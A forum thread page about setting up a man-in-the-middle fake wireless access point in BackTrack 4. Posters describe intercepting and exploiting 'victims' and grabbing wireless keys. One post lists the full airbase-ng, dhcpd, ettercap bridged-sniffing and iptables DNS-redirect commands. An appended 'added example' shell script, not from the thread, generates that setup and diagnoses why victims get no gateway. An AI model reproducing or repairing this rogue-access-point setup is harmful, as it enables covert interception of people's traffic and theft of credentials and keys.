Page 2 of 2 (results 11 to 13 of 13)

Thread: MITM attack tools !

#11 (Junior Member, Join Date: Oct 2008)


    Quote Originally Posted by hm2075:
    No probs, I already had it open because I was working on the wireless key grabber, so it's only a slight deviation.

    Maybe next weekend I'll redo the transparent fake access point for BT4.

    It's much easier in BT4; I have a bit more experience with Ubuntu.
    That's fantastic, hm2075... Give it a try in BT4 and let us know further!

    Do you know whether Karmetasploit works exactly the same way as airbase + iptables + dhcpd, only that Karmetasploit is a framework offering all these functionalities?

    I was going to use Karmetasploit as my first option to set up my MITM AP, but once I discovered your tutorial it was a lot easier for me, because everything was explained clearly.

    I think Karmetasploit is indeed a very sophisticated tool that provides many services, but I didn't use it because I couldn't find any help!

    I wish you good luck with your wireless key grabber!

    Give us a shout when you are done!

#12 (Join Date: Feb 2010)


    I did use Karmetasploit, but it's not exactly what I wanted.

    My projects were as follows:

    (1) Create a fake access point that allows the victim to surf the internet successfully while you try to exploit him;

    if no exploit works, we redirect him to our localhost and host a few exploits there.

    Then the project moved on to grabbing the wireless key, which was great fun setting up.

    It all depends on what you want in the end. It's fun learning.

    PS: the wireless key grabber setup for BT4 was done a few days ago; it's in the wireless section.

#13 (Junior Member, Join Date: Oct 2008)


    I will definitely look at your new project because it is of interest to me.

    I am more interested in the idea of fake APs.

    Besides, I have tested the fake AP project in BackTrack 4 under VirtualBox on my network. I use the ALFA AWUS036 rtl8187l USB card. Unfortunately I was a little unlucky: the whole thing didn't work exactly as it was intended to.

    The creation of the fake AP worked wonderfully, the connectivity of the victim to the fake AP worked fine as well, DHCP worked too and the victim device was getting an IP address. The only problem I had was the default gateway: the victim device couldn't see the default gateway, so obviously no internet connectivity was offered to the victim device.

    Below I will explain clearly how I've done everything and which commands were used, and hopefully at the end you or someone else can help me figure out where the problem might be!

    My current network setup is as follows:

    I have an old wireless D-Link router (DI-624). Its WAN port is connected directly to the modem, which is connected to the ISP for my internet connection.

    The other 4 LAN switch ports are used as follows:

    1st: connected to my laptop NIC, which is bridged over VirtualBox so I can have an internet connection in BT4 under VirtualBox.

    The 2nd to 4th ports are not used.

    My network addressing scheme is as follows:

    I am using the default IP address for my router (I know it's a bad idea), which is

    The subnet mask of my network is

    Default gateway: the same as the router IP address (

    Static DHCP is used on my network, so each device on my network has been assigned in the DHCP table by its MAC address. So any other device that needs access must first have its MAC address configured in the DHCP table. (That all makes sense; I am using wired MAC filtering.)

    bt~# ifconfig

    eth0 Link encap:Ethernet HWaddr 08:00:27:66:72:b1
    inet addr: Bcast: Mask:
    inet6 addr: fe80::a00:27ff:fe66:72b1/64 Scope:Link
    RX packets:3467 errors:0 dropped:0 overruns:0 frame:0
    TX packets:425 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:1320920 (1.3 MB) TX bytes:94682 (94.6 KB)
    Interrupt:19 Base address:0xc020

    lo Link encap:Local Loopback
    inet addr: Mask:
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:106 errors:0 dropped:0 overruns:0 frame:0
    TX packets:106 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:5300 (5.3 KB) TX bytes:5300 (5.3 KB)
    Below, all the commands I used for the fake AP project are shown.

    Creating & starting the fake AP

    bt~# airmon-ng start wlan0

    Interface Chipset Driver

    wlan0 RTL8187 rtl8187 - [phy0]
    (monitor mode enabled on mon2)
    mon0 RTL8187 rtl8187 - [phy0]
    mon1 RTL8187 rtl8187 - [phy0]
    bt~# airbase-ng -e "Backtrack 3" wlan0 -v

    22:42:45 Created tap interface at0
    22:42:45 Trying to set MTU on at0 to 1500
    22:42:45 Access Point with BSSID 00:C0:CA:1B:6B:83 started.
    22:42:46 Got broadcast probe request from 00:21:63:xx:xx:xx
    22:42:47 Got broadcast probe request from 00:1F:3B:xx:xx:xx
    22:42:47 Got broadcast probe request from 00:1F:3B:xx:xx:xx
    My DHCP (/etc/dhcp3/dhcpd.conf) configuration file modifications:

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;

    subnet netmask {
        option routers;
        option subnet-mask;
        option broadcast-address;
        option domain-name-servers;
        range dynamic-bootp;
    }
    Configuring the virtual interface:

    bt~# ifconfig at0 up
    bt~# ifconfig at0 netmask
    bt~# ifconfig at0 mtu 1500
    bt~# ettercap -Tq -B eth0 -i at0
    bt~# route add -net netmask gw
    iptables configuration:

    bt~# iptables --flush
    bt~# iptables --table nat --flush
    bt~# iptables --delete-chain
    bt~# iptables --table nat --delete-chain
    bt~# echo 1 > /proc/sys/net/ipv4/ip_forward
    bt~# iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to
    bt~# iptables -P FORWARD ACCEPT
    bt~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    bt~# iptables --append FORWARD --in-interface at0 -j ACCEPT
    Killing and starting the DHCP server:

    bt~# killall dhcpd    (I don't know if this is the correct command to use in BT4)
    bt~# /etc/init.d/dhcp3-server restart

    The problem I experienced (not getting some bits of it working) is written near the top of my post. It was long, I know... but it was worth it. It will also be useful for others!

    So, is anyone willing to help me out solving the issues I am having?

    Thank you very much!
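The following is an added example, not code from the thread or from any of its posters. It assembles the plumbing post #13 describes (the airbase-ng tap interface at0, a dhcpd.conf, and the iptables NAT rules) as a dry run and, before any of it would be started, checks the two addressing mistakes that most often produce exactly the symptom described: a client that gets a lease but cannot reach its default gateway. Those are (a) the address in `option routers` not matching the address configured on at0, and (b) the at0 subnet overlapping the upstream (eth0) subnet so the host routes replies out the wrong interface. All addresses, the interface names and the DNS server are assumptions chosen for illustration (upstream on 192.168.0.0/24, fake AP on 10.0.0.0/24); the thread's real addresses are not on the page, so nothing here claims to be the poster's actual cause.

```shell
#!/bin/sh
# Added example (not from the thread). Dry-run builder plus sanity check for the
# fake-AP setup: at0 (airbase-ng tap) + dhcpd + iptables NAT out of eth0.
# Assumed addressing: eth0 on 192.168.0.0/24, at0 on 10.0.0.0/24.

# dotted quad -> 32-bit integer, pure POSIX sh (IFS applies to read only)
ip2int() {
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# network number of ip/mask as an integer
net_of() {
    echo $(( $(ip2int "$1") & $(ip2int "$2") ))
}

# Returns 0 when the gateway dhcpd advertises equals the at0 address AND the
# at0 subnet does not overlap the upstream subnet; otherwise prints the reason
# to stderr and returns 1. This is the check to run when clients get a lease
# but "cannot see the default gateway".
check_addressing() {
    at0_ip=$1; at0_mask=$2; routers_opt=$3; up_ip=$4; up_mask=$5
    if [ "$(ip2int "$at0_ip")" -ne "$(ip2int "$routers_opt")" ]; then
        echo "option routers ($routers_opt) != at0 address ($at0_ip)" >&2
        return 1
    fi
    if [ "$(net_of "$up_ip" "$at0_mask")" -eq "$(net_of "$at0_ip" "$at0_mask")" ] ||
       [ "$(net_of "$at0_ip" "$up_mask")" -eq "$(net_of "$up_ip" "$up_mask")" ]; then
        echo "at0 subnet $at0_ip/$at0_mask overlaps upstream $up_ip/$up_mask" >&2
        return 1
    fi
    return 0
}

# Emit a dhcpd.conf for the at0 subnet in the layout the post uses.
gen_dhcpd_conf() {
    net=$1; mask=$2; gw=$3; bcast=$4; dns=$5; lo=$6; hi=$7
    cat <<EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;

subnet $net netmask $mask {
    option routers $gw;
    option subnet-mask $mask;
    option broadcast-address $bcast;
    option domain-name-servers $dns;
    range $lo $hi;
}
EOF
}

# Print (do not run) the interface and NAT commands in the post's order, with
# the DNAT restricted to traffic arriving on at0 and a return-path FORWARD rule.
# Review the output, then pipe it into sh as root once check_addressing passes.
gen_fakeap_cmds() {
    up_if=$1; ap_if=$2; ap_ip=$3; ap_mask=$4; dns=$5
    cat <<EOF
ifconfig $ap_if up
ifconfig $ap_if $ap_ip netmask $ap_mask
ifconfig $ap_if mtu 1500
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -i $ap_if -p udp --dport 53 -j DNAT --to $dns
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $up_if -j MASQUERADE
iptables -A FORWARD -i $ap_if -o $up_if -j ACCEPT
iptables -A FORWARD -i $up_if -o $ap_if -m state --state ESTABLISHED,RELATED -j ACCEPT
EOF
}

# Dry run with the assumed addresses: check first, then print the artifacts.
main() {
    check_addressing 10.0.0.1 255.255.255.0 10.0.0.1 192.168.0.50 255.255.255.0 || return 1
    gen_dhcpd_conf 10.0.0.0 255.255.255.0 10.0.0.1 10.0.0.255 192.168.0.1 10.0.0.100 10.0.0.200
    gen_fakeap_cmds eth0 at0 10.0.0.1 255.255.255.0 192.168.0.1
}
main
```

Two further things worth verifying on the box itself, independent of this script: that dhcpd is actually listening on at0 (on Ubuntu-based BT4 the dhcp3-server init script takes its interface list from /etc/default/dhcp3-server), and that the routing works with ettercap stopped. `ettercap -B` is bridged sniffing mode, which forwards frames between the two interfaces itself on top of whatever the kernel is forwarding, so testing without it first separates a NAT problem from a sniffer problem.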

